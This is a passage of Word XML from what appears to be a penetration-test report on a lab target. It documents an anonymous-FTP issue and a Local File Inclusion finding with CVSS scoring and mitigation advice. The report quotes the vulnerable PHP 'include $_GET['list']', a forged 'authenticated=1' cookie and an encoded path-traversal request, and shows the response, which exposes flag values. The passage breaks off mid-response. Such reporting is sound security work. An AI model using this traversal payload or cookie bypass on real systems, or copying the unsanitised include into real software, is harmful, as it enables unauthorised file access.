      <w:r>
        <w:t xml:space="preserve">Rapid 7 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00336FE0">
        <w:t>FTP access with anonymous account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C0111" w14:textId="6B35E18F" w:rsidR="00336FE0" w:rsidRDefault="00336FE0" w:rsidP="00336FE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/vulnerabilities/FTP-GENERIC-0002/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE76479" w14:textId="77777777" w:rsidR="003C219B" w:rsidRDefault="003C219B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B561E9A" w14:textId="7E7E8874" w:rsidR="0056593D" w:rsidRPr="001215EC" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E0EE63" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="006F5E52" w:rsidRDefault="0056593D" w:rsidP="0056593D">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56593D" w:rsidRPr="005264D0" w14:paraId="375211E0"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7D2609C7" w14:textId="22CFD394" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="00B47DC6" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Local File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056593D" w:rsidRPr="005264D0" w14:paraId="780E7DB4"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62849E82" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="00DA733E" w:rsidRDefault="0056593D"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14C1BCCB" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="0056593D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="677469DF" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="0056593D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056593D" w:rsidRPr="005264D0" w14:paraId="53B4CA59"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5EF95F98" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="0056593D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD53824" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="0056593D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D78276" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="005264D0" w:rsidRDefault="0056593D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002318B9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59C39E3C" w14:textId="6BD79C4D" w:rsidR="0056593D" w:rsidRPr="00DA733E" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:commentRangeStart w:id="20"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeEnd w:id="20"/>
      <w:r w:rsidR="00335D96">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="20"/>
      </w:r>
      <w:r w:rsidR="00DD64D1" w:rsidRPr="00DD64D1">
        <w:t xml:space="preserve"> This type of vulnerability arises when an application does not properly validate user input and allows an attacker to control the path or file name of a file to be included in a server-side script. By exploiting this vulnerability, an attacker can access sensitive files and data stored on the web server or execute arbitrary code, including malicious scripts or commands. These attacks can be particularly damaging if sensitive configuration files, password files, or other sensitive system files are exposed. To mitigate this vulnerability, developers should ensure that all user input is properly sanitized and validated, and that file paths and names are constructed using a whitelist of known good values. Additionally, access controls should be implemented to restrict access to sensitive files and data on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A3ED6" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12207653" w14:textId="2F0C134B" w:rsidR="0013450B" w:rsidRPr="003C17E2" w:rsidRDefault="0013450B" w:rsidP="0013450B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="0013450B">
        <w:t>/internal/customers.ph</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268036E" w14:textId="2B579917" w:rsidR="0013450B" w:rsidRPr="003C17E2" w:rsidRDefault="0013450B" w:rsidP="0013450B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B584C0E" w14:textId="27E8C1D3" w:rsidR="0013450B" w:rsidRPr="003C17E2" w:rsidRDefault="0013450B" w:rsidP="0013450B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>:8001</w:t>
      </w:r>
      <w:r w:rsidRPr="0013450B">
        <w:t>/internal/customers.ph</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75CB1A" w14:textId="292C933D" w:rsidR="0056593D" w:rsidRDefault="0013450B" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B0E35" w:rsidRPr="0058427B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD8BA0" w14:textId="77777777" w:rsidR="0056593D" w:rsidRPr="006F5E52" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2312C" w14:textId="69B7877B" w:rsidR="0056593D" w:rsidRDefault="009B0E35" w:rsidP="0056593D">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>internal/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page displays a list of customers to employees who have logged into the site. The application loads the list, stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/data/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, using the</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL parameter. The</w:t>
      </w:r>
      <w:r w:rsidRPr="009B0E35">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter value is the location of the list. The below figure shows the code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884CD5">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00884CD5">
        <w:t xml:space="preserve">, where the value of </w:t>
      </w:r>
      <w:r w:rsidR="00884CD5" w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidR="0058427B">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00884CD5">
        <w:t xml:space="preserve"> used to include the file contents.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0056593D" w14:paraId="4F209E66" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="25D02C88" w14:textId="77777777" w:rsidR="00884CD5" w:rsidRPr="00884CD5" w:rsidRDefault="00884CD5" w:rsidP="00884CD5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884CD5">
              <w:t>if($_COOKIE['authenticated</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884CD5">
              <w:t>']=</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884CD5">
              <w:t>=1){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E492962" w14:textId="77777777" w:rsidR="00884CD5" w:rsidRPr="00884CD5" w:rsidRDefault="00884CD5" w:rsidP="00884CD5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884CD5">
              <w:t xml:space="preserve">    print(base64_decode("ZmxhZzJ7YXV0aG9yaXplZF91c2VyX2FjY2Vzc30=")."&lt;/br&gt;"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884CD5">
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="17C5757D" w14:textId="77777777" w:rsidR="00884CD5" w:rsidRPr="00884CD5" w:rsidRDefault="00884CD5" w:rsidP="00884CD5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00884CD5">
              <w:t xml:space="preserve">    include $_GET['list'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884CD5">
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4BC13BD1" w14:textId="0D38EA92" w:rsidR="0056593D" w:rsidRPr="004E111C" w:rsidRDefault="00884CD5" w:rsidP="00884CD5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884CD5">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31698C91" w14:textId="0DFE2677" w:rsidR="0056593D" w:rsidRDefault="00884CD5" w:rsidP="0056593D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Code to Load Customer List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77621FE7" w14:textId="2A566E07" w:rsidR="00884CD5" w:rsidRDefault="00884CD5" w:rsidP="00884CD5">
      <w:r>
        <w:t xml:space="preserve">The value of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is inserted directly into the </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statement. This allowed the Hyperthetical team to access other files stored on the server by changing the value. </w:t>
      </w:r>
      <w:r w:rsidR="0058427B">
        <w:t xml:space="preserve">Although they were unable to access certain restricted resources, they were able to access data in the server user account’s home directory, such as </w:t>
      </w:r>
      <w:r w:rsidR="0058427B" w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:r w:rsidR="0058427B">
        <w:t>, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCDD2F" w14:textId="0E07586A" w:rsidR="0058427B" w:rsidRPr="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB4CE3D" wp14:editId="354C6992">
            <wp:extent cx="4428490" cy="2653462"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="13970"/>
            <wp:docPr id="181644569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5695" name="Picture 7" descr="Graphical user interface,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093" t="24582" r="4108" b="4995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4467324" cy="26767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Pr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3 Contents Displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D457D27" w14:textId="318E64CD" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
      <w:r>
        <w:t xml:space="preserve">The following request and response pair demonstrate the assessment team’s attack and the application response with the contents of </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF0953" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="00F62F5D" w:rsidRDefault="0058427B" w:rsidP="0058427B">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58427B" w14:paraId="3BD3BFF0" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="751D8259" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t xml:space="preserve">GET </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0058427B">
              <w:t>/internal/customers.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="0058427B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0058427B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=..%2Fdata%2f..%2f..%2f..%2f..%2fhome%2fgibson%2fflag3</w:t>
            </w:r>
            <w:r w:rsidRPr="0058427B">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081E8BE4" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E9718A" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B56818" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Cookie: authenticated=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C509E3F" w14:textId="0E671399" w:rsidR="0058427B" w:rsidRPr="00F62F5D" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="0058427B">
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EBF6C2D" w14:textId="77777777" w:rsidR="0058427B" w:rsidRPr="00F62F5D" w:rsidRDefault="0058427B" w:rsidP="0058427B">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58427B" w14:paraId="463C0002" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="21316B97" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF93739" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Date: Fri, 28 Apr 2023 11:00:48 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C88ED4" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271C1E14" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>&lt;div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CBAAE8B" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C6FD10" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;p&gt;&lt;b&gt;Future Customers&lt;/b&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE71E51" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1982B230" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;/header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FAAE15" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;p&gt;FOR INTERNAL USE ONLY&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF542E1" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;p&gt;flag2{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorized_user_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>access</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>}&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2813971E" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> belongs to an elite order, a hallowed subcategory. He's got esprit up to here. Right now, he is preparing to carry out his third mission of the night. His uniform is black as activated charcoal, filtering the very light out of the air. A bullet will bounce off its </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arachnofiber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
